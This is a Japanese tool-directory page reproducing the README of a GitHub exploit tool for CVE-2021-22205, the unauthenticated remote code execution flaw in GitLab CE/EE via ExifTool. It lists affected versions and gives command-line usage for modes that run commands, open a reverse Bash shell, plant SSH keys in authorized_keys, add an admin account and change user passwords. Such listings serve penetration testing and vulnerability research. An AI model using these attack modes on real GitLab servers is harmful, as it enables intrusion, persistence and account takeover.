Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-22205 — ExifToolを使用したGitLab CE/EEの事前認証RCE | Kitploit
ツール/GitHubGitHub/inspiringz/cve-2021-22205
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールArchived
GitHubinspiringz/cve-2021-22205

CVE-2021-22205

ExifToolを使用したGitLab CE/EEの事前認証RCE

リポジトリを見る
237414年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

このプロジェクトは学習目的のみです。もし誰かの権利を侵害している場合は、プロジェクトを削除するためにご連絡ください。また、最後に 不正に使用しないでください このツールの使用中に違法行為を行った場合、そのすべての結果は自己責任となります。本ツールのすべての開発者およびすべての貢献者は、いかなる法的および共同責任も負いません。

説明

GitLab CE/EE において、バージョン 11.9 以降のすべてに影響する問題が発見されました。GitLab はファイルパーサーに渡される画像ファイルを適切に検証しておらず、その結果としてリモートコマンド実行が発生しました。

影響を受けるバージョン:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

機能

  • Webpack の manifest.json 内のハッシュによる GitLab バージョン検出
  • DNSLog と PostBin RequestBin を使用した自動的な out-of-band インタラクション
  • リバース Bash シェル / SSH 公開鍵の authorized_keys への追加をサポート
  • ENTER で GitLab ユーザーパスワードの変更と復元をサポート

使用方法

root@kitploit:~
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

使用法:
    python3 CVE-2021-22205.py -u site_url -m detect        # GitLabバージョンと脆弱性の検出
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # RCE(RequestBin OOB経由のecho)
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # RCE(ファイル書き込み経由のecho)*
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # リバースBashシェル
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH公開鍵のauthorized_keysへの追加
    python3 CVE-2021-22205.py -u site_url -m add user pass # 管理者アカウントの追加 *
    python3 CVE-2021-22205.py -u site_url -m mod user      # 指定ユーザーのパスワードを変更 => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # 指定ユーザーの元のパスワードを復元
  • site_url パラメータの形式: http[s]://<ドメイン|IP>[:ポート]/、例: https://example.com:9000/
  • * が付いたメソッド(rce2, add)は不安定で、動作しない可能性があります :(
  • 実際の環境に応じてスクリプトの内容を変更できます

スクリーンショット

検出:

image-20220116233646585

RCE(RequestBin OOB経由のecho):

image-20220116234003576

リバースBashシェル:

image-20211111131442470

SSH公開鍵のauthorized_keysへの追加:

image-20211111133555010

GitLabユーザーパスワードの変更と復元:

image-20211111132115090

参考

  • https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
  • https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
  • https://github.com/righel/gitlab-version-nse
ツールをダウンロード